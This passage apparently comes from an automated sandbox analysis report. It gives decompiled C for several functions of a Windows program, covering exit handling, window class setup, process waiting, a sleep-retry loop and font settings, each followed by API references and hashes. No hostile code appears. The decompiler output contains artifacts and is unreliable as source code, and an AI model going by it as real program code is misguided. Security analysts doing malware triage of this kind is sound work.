				} else {
					do {
						_t33 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t33();
					} while ( *0x6cf058 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                    0x00409f0c
                                                                    0x00409f0e
                                                                    0x00409f13
                                                                    0x00409f1a
                                                                    0x00409f1a
                                                                    0x00409f26
                                                                    0x00409f3a
                                                                    0x00409f44
                                                                    0x00409f44
                                                                    0x00409f4d
                                                                    0x00409f71
                                                                    0x00409f75
                                                                    0x00409f7e
                                                                    0x00409f7e
                                                                    0x00409f85
                                                                    0x00409fa4
                                                                    0x00409fa4
                                                                    0x00409fad
                                                                    0x00409fb4
                                                                    0x00409fb9
                                                                    0x00409fbb
                                                                    0x00409fc0
                                                                    0x00409fc3
                                                                    0x00409fc3
                                                                    0x00409fc6
                                                                    0x00409fc9
                                                                    0x00409fd0
                                                                    0x00409fd0
                                                                    0x00409fc9
                                                                    0x00409fb9
                                                                    0x00409fd7
                                                                    0x00409fe0
                                                                    0x00409fe2
                                                                    0x00409fe2
                                                                    0x00409fe9
                                                                    0x00409fed
                                                                    0x00409fed
                                                                    0x00409ff5
                                                                    0x00409ffe
                                                                    0x0040a000
                                                                    0x0040a000
                                                                    0x0040a009
                                                                    0x0040a009
                                                                    0x0040a01b
                                                                    0x0040a01b
                                                                    0x0040a01d
                                                                    0x0040a01e
                                                                    0x00000000
                                                                    0x00409f87
                                                                    0x00409f87
                                                                    0x00409f8c
                                                                    0x00409f90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f92
                                                                    0x00409f94
                                                                    0x00409f99
                                                                    0x00409f9e
                                                                    0x00409fa0
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f61
                                                                    0x00409f66
                                                                    0x00409f68
                                                                    0x00000000
                                                                    0x00409f71
                                                                    0x00000000
                                                                    0x00409f71

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                    • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                                    • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                    • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00409EF0() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t50);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L9:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L15:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t18 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t18);
								_t34 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L9;
					} else {
						_t23 = E00406FD0();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00408444(_t48);
							_t26 = E00406FD0();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t36();
					} while ( *0x6cf058 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                    0x00409ef2
                                                                    0x00409f0c
                                                                    0x00409f0e
                                                                    0x00409f13
                                                                    0x00409f1a
                                                                    0x00409f1a
                                                                    0x00409f26
                                                                    0x00409f3a
                                                                    0x00409f44
                                                                    0x00409f44
                                                                    0x00409f4d
                                                                    0x00409f71
                                                                    0x00409f75
                                                                    0x00409f7e
                                                                    0x00409f7e
                                                                    0x00409f85
                                                                    0x00409fa4
                                                                    0x00409fa4
                                                                    0x00409fad
                                                                    0x00409fb4
                                                                    0x00409fb9
                                                                    0x00409fbb
                                                                    0x00409fc0
                                                                    0x00409fc3
                                                                    0x00409fc3
                                                                    0x00409fc6
                                                                    0x00409fc9
                                                                    0x00409fd0
                                                                    0x00409fd0
                                                                    0x00409fc9
                                                                    0x00409fb9
                                                                    0x00409fd7
                                                                    0x00409fe0
                                                                    0x00409fe2
                                                                    0x00409fe2
                                                                    0x00409fe9
                                                                    0x00409fed
                                                                    0x00409fed
                                                                    0x00409ff5
                                                                    0x00409ffe
                                                                    0x0040a000
                                                                    0x0040a000
                                                                    0x0040a009
                                                                    0x0040a009
                                                                    0x0040a01b
                                                                    0x0040a01b
                                                                    0x0040a01d
                                                                    0x0040a01e
                                                                    0x00000000
                                                                    0x00409f87
                                                                    0x00409f87
                                                                    0x00409f8c
                                                                    0x00409f90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f92
                                                                    0x00409f94
                                                                    0x00409f99
                                                                    0x00409f9e
                                                                    0x00409fa0
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f61
                                                                    0x00409f66
                                                                    0x00409f68
                                                                    0x00000000
                                                                    0x00409f71
                                                                    0x00000000
                                                                    0x00409f71

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                    • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                                    • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                    • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E004785F8(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSW _v44;
				WCHAR* _t8;
				int _t10;
				void* _t11;
				struct HWND__* _t15;
				long _t17;
				WCHAR* _t20;
				struct HWND__* _t22;
				WCHAR* _t24;

				 *0x6c7aa8 =  *0x6d2634;
				_t8 =  *0x6c7abc; // 0x4785dc
				_t10 = GetClassInfoW( *0x6d2634, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00414778 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t20 =  *0x6c7abc; // 0x4785dc
						UnregisterClassW(_t20,  *0x6d2634);
					}
					RegisterClassW(0x6c7a98);
				}
				_t24 =  *0x6c7abc; // 0x4785dc
				_t15 = E00414DA0(0x80, _t24, 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					_t17 = E0047845C(_a4, _a8); // executed
					SetWindowLongW(_t22, 0xfffffffc, _t17);
				}
				return _t22;
			}












                                                                    0x00478604
                                                                    0x0047860d
                                                                    0x00478619
                                                                    0x00478621
                                                                    0x00478623
                                                                    0x00478626
                                                                    0x00478634
                                                                    0x0047863c
                                                                    0x00478642
                                                                    0x00478642
                                                                    0x0047864c
                                                                    0x0047864c
                                                                    0x0047866f
                                                                    0x0047867a
                                                                    0x0047867f
                                                                    0x00478686
                                                                    0x0047868e
                                                                    0x00478697
                                                                    0x00478697
                                                                    0x004786a2

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                    • String ID:
                                                                    • API String ID: 4025006896-0
                                                                    • Opcode ID: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                                    • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                                    • Opcode Fuzzy Hash: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                                    • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060EFD8, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForInputIdle.USER32 ref: 0060F004
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                                    • GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                                    • CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                    • String ID:
                                                                    • API String ID: 4071923889-0
                                                                    • Opcode ID: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                                    • Instruction ID: 3bf9388a4eab4805cc6f518967bcd8e0b9f61bd1b59095cebcc575be48bbaf87
                                                                    • Opcode Fuzzy Hash: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                                    • Instruction Fuzzy Hash: 24012D70A80308BEEB3497A58D16FEBBBADDF45760F510536F604C36C2D5759D40C664
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E006ACABC(signed char __eax, void* __ecx, void* __edx, void* __eflags) {
				long _t7;
				void* _t9;
				void* _t14;
				void* _t15;
				signed char* _t16;

				_t17 = __eflags;
				_push(__ecx);
				_t14 = __ecx;
				_t15 = __edx;
				 *_t16 = __eax;
				while(1) {
					E0060C158( *_t16 & 0x000000ff, _t15, _t17); // executed
					asm("sbb ebx, ebx");
					_t9 = _t9 + 1;
					if(_t9 != 0 || GetLastError() == 2 || GetLastError() == 3) {
						break;
					}
					_t7 = GetTickCount();
					_t17 = _t7 - _t14 - 0x7d0;
					if(_t7 - _t14 < 0x7d0) {
						Sleep(0x32);
						continue;
					}
					break;
				}
				return _t9;
			}








                                                                    0x006acabc
                                                                    0x006acabf
                                                                    0x006acac0
                                                                    0x006acac2
                                                                    0x006acac4
                                                                    0x006acac7
                                                                    0x006acacd
                                                                    0x006acad5
                                                                    0x006acad7
                                                                    0x006acada
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006acaf0
                                                                    0x006acaf7
                                                                    0x006acafc
                                                                    0x006acb00
                                                                    0x00000000
                                                                    0x006acb00
                                                                    0x00000000
                                                                    0x006acafc
                                                                    0x006acb0d

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountSleepTick
                                                                    • String ID:
                                                                    • API String ID: 2227064392-0
                                                                    • Opcode ID: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                                    • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                                    • Opcode Fuzzy Hash: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                                    • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AE3C8(long __eax, void* __ecx, void* __fp0) {
				void* __ebx;
				void* __ebp;
				long _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr* _t69;
				struct HWND__* _t72;
				int _t73;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				long _t126;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t147;

				_t147 = __fp0;
				_t95 = __ecx;
				_t23 = __eax;
				_t126 = __eax;
				_t131 = _t126 -  *0x6cd738; // 0x0
				if(_t131 == 0) {
					L28:
					return _t23;
				}
				_t24 =  *0x6d66f8; // 0x0
				_t93 = E00464CD0(_t24, __eax);
				_t1 = _t93 + 0x18; // 0x18
				_t100 = E0040A77C(_t1);
				_t28 =  *((intOrPtr*)(_t93 + 0x18));
				if(_t28 != 0) {
					_t28 =  *((intOrPtr*)(_t28 - 4));
				}
				E005CD600(_t100, _t95, _t28);
				E005C77C4();
				E005C77C4();
				 *0x6cd738 = _t126;
				_t104 =  *0x5cac34; // 0x5cac38
				E0040BFAC(0x6d66b8, _t104);
				_t98 =  *0x5cac34; // 0x5cac38
				E0040C278(0x6d66b8, _t98, _t93, _t147);
				if( *0x6d66e0 == 0x411 &&  *0x6d67f0 < 0x5010000 && E005C7F8C(L"MS PGothic", _t93) != 0) {
					E0040A5A8(0x6d66c8, L"MS PGothic");
					 *0x6d66ec = 0xc;
				}
				if( *((intOrPtr*)(_t93 + 0x1c)) == 0) {
					_t106 =  *0x6d6601; // 0x0
					E0040A644(0x6d6744, _t106);
				} else {
					E0040A644(0x6d6744,  *((intOrPtr*)(_t93 + 0x1c)));
				}
				if( *((intOrPtr*)(_t93 + 0x20)) == 0) {
					_t107 =  *0x6d6605; // 0x0
					E0040A644(0x6d6748, _t107);
				} else {
					E0040A644(0x6d6748,  *((intOrPtr*)(_t93 + 0x20)));
				}
				_t139 =  *((intOrPtr*)(_t93 + 0x24));
				if( *((intOrPtr*)(_t93 + 0x24)) == 0) {
					_t108 =  *0x6d6609; // 0x0
					E0040A644(0x6d674c, _t108);
				} else {
					E0040A644(0x6d674c,  *((intOrPtr*)(_t93 + 0x24)));
				}
				E005C9044( *0x6d66f4 & 0x000000ff);
				_t49 =  *0x6cded8; // 0x6d5c28
				_t10 = _t49 + 0x1e8; // 0x0
				E005C8FB8(0, _t98, E0040B278( *_t10), _t139);
				_t54 =  *0x6cded8; // 0x6d5c28
				_t11 = _t54 + 0xb0; // 0x0
				E005C8FB8(1, _t98, E0040B278( *_t11), _t139);
				_t59 =  *0x6cded8; // 0x6d5c28
				_t12 = _t59 + 0x164; // 0x0
				E005C8FB8(2, _t98, E0040B278( *_t12), _t139);
				_t64 =  *0x6cded8; // 0x6d5c28
				_t13 = _t64 + 0x164; // 0x0
				E005C8FB8(3, _t98, E0040B278( *_t13), _t139);
				_t113 =  *0x6cded8; // 0x6d5c28
				_t14 = _t113 + 0x2f8; // 0x0
				_t69 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t69,  *_t14, _t139);
				_t23 =  *0x6d6704; // 0x0
				_t128 =  *((intOrPtr*)(_t23 + 8)) - 1;
				if(_t128 < 0) {
					L26:
					if( *0x6d64a4 == 0) {
						goto L28;
					}
					_t72 =  *0x6d64a8; // 0x70264
					_t73 = SendNotifyMessageW(_t72, 0x496, 0x2711, _t126); // executed
					return _t73;
				} else {
					_t129 = _t128 + 1;
					_t130 = 0;
					do {
						_t74 =  *0x6d6704; // 0x0
						_t94 = E00464CD0(_t74, _t130);
						_t77 = ( *(_t94 + 0x25) & 0x000000ff) - 1;
						if(_t77 == 0) {
							_t17 = _t94 + 4; // 0x4
							_t116 =  *0x6cded8; // 0x6d5c28
							_t18 = _t116 + 0x1c8; // 0x0
							_t23 = E0040A5A8(_t17,  *_t18);
						} else {
							_t79 = _t77 - 1;
							if(_t79 == 0) {
								_t19 = _t94 + 4; // 0x4
								_t118 =  *0x6cded8; // 0x6d5c28
								_t20 = _t118 + 0x94; // 0x0
								_t23 = E0040A5A8(_t19,  *_t20);
							} else {
								_t23 = _t79 - 1;
								if(_t23 == 0) {
									_t21 = _t94 + 4; // 0x4
									_t120 =  *0x6cded8; // 0x6d5c28
									_t22 = _t120 + 0xb8; // 0x0
									_t23 = E0040A5A8(_t21,  *_t22);
								}
							}
						}
						_t130 = _t130 + 1;
						_t129 = _t129 - 1;
					} while (_t129 != 0);
					goto L26;
				}
			}





































                                                                    0x006ae3c8
                                                                    0x006ae3c8
                                                                    0x006ae3c8
                                                                    0x006ae3cc
                                                                    0x006ae3ce
                                                                    0x006ae3d4
                                                                    0x006ae621
                                                                    0x006ae621
                                                                    0x006ae621
                                                                    0x006ae3dc
                                                                    0x006ae3e6
                                                                    0x006ae3e8
                                                                    0x006ae3f0
                                                                    0x006ae3f2
                                                                    0x006ae3f7
                                                                    0x006ae3fc
                                                                    0x006ae3fc
                                                                    0x006ae3ff
                                                                    0x006ae413
                                                                    0x006ae427
                                                                    0x006ae42c
                                                                    0x006ae437
                                                                    0x006ae43d
                                                                    0x006ae449
                                                                    0x006ae44f
                                                                    0x006ae45e
                                                                    0x006ae484
                                                                    0x006ae489
                                                                    0x006ae489
                                                                    0x006ae497
                                                                    0x006ae4ad
                                                                    0x006ae4b3
                                                                    0x006ae499
                                                                    0x006ae4a1
                                                                    0x006ae4a1
                                                                    0x006ae4bc
                                                                    0x006ae4d2
                                                                    0x006ae4d8
                                                                    0x006ae4be
                                                                    0x006ae4c6
                                                                    0x006ae4c6
                                                                    0x006ae4dd
                                                                    0x006ae4e1
                                                                    0x006ae4f7
                                                                    0x006ae4fd
                                                                    0x006ae4e3
                                                                    0x006ae4eb
                                                                    0x006ae4eb
                                                                    0x006ae509
                                                                    0x006ae50e
                                                                    0x006ae513
                                                                    0x006ae522
                                                                    0x006ae527
                                                                    0x006ae52c
                                                                    0x006ae53b
                                                                    0x006ae540
                                                                    0x006ae545
                                                                    0x006ae554
                                                                    0x006ae559
                                                                    0x006ae55e
                                                                    0x006ae56d
                                                                    0x006ae572
                                                                    0x006ae578
                                                                    0x006ae57e
                                                                    0x006ae585
                                                                    0x006ae58a
                                                                    0x006ae592
                                                                    0x006ae595
                                                                    0x006ae5fe
                                                                    0x006ae605
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006ae612
                                                                    0x006ae618
                                                                    0x00000000
                                                                    0x006ae597
                                                                    0x006ae597
                                                                    0x006ae598
                                                                    0x006ae59a
                                                                    0x006ae59c
                                                                    0x006ae5a6
                                                                    0x006ae5ac
                                                                    0x006ae5ae
                                                                    0x006ae5ba
                                                                    0x006ae5bd
                                                                    0x006ae5c3
                                                                    0x006ae5c9
                                                                    0x006ae5b0
                                                                    0x006ae5b0
                                                                    0x006ae5b2
                                                                    0x006ae5d0
                                                                    0x006ae5d3
                                                                    0x006ae5d9
                                                                    0x006ae5df
                                                                    0x006ae5b4
                                                                    0x006ae5b4
                                                                    0x006ae5b6
                                                                    0x006ae5e6
                                                                    0x006ae5e9
                                                                    0x006ae5ef
                                                                    0x006ae5f5
                                                                    0x006ae5f5
                                                                    0x006ae5b6
                                                                    0x006ae5b2
                                                                    0x006ae5fa
                                                                    0x006ae5fb
                                                                    0x006ae5fb
                                                                    0x00000000
                                                                    0x006ae59a

                                                                    APIs
                                                                    • SendNotifyMessageW.USER32(00070264,00000496,00002711,-00000001), ref: 006AE618
